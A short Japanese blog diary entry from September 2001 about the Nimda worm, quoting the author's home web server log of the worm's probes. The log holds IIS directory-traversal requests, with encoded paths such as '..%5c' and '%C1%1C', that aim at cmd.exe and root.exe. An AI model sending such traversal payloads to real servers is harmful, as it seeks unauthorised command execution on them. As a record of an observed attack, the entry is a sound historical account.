2001-09-20  Nimda ワームが大流行

量が多くてすごいです。私もイタズラされてしまいました(なぞ)。お家のWWWサーバにもアクセス記録がどっさり残っておりました。

10:44:05 211.219.***.*** GET /scripts/root.exe 404
10:44:05 211.219.***.*** GET /MSADC/root.exe 404
10:44:05 211.219.***.*** GET /c/winnt/system32/cmd.exe 404
10:44:06 211.219.***.*** GET /d/winnt/system32/cmd.exe 404
10:44:06 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500
10:44:06 211.219.***.*** GET /_vti_bi..%5c...%5c...%5c../winnt/system32/cmd.exe 500
10:44:07 211.219.***.*** GET /_mem_bi..%5c...%5c...%5c../winnt/system32/cmd.exe 404
10:44:07 211.219.***.*** GET /msad..%5c...%5c...%5..%C1%1C...%C1%1C...%C1%1C../winnt/system32/cmd.exe 500
10:44:07 211.219.***.*** GET /script..%C1%1C../winnt/system32/cmd.exe 500
10:44:08 211.219.***.*** GET /scripts/winnt/system32/cmd.exe 404
10:44:08 211.219.***.*** GET /winnt/system32/cmd.exe 404
10:44:08 211.219.***.*** GET /winnt/system32/cmd.exe 404
10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500
10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500
10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500
10:44:10 211.219.***.*** GET /script..%2f../winnt/system32/cmd.exe 500

cmd.exe をイタズラしようとするのですね。悪戯はだめですよ。イタズラは。(注意:強調文字の「%C1」「%1C」には,実際にはエスケープ前の生の文字値が入ります)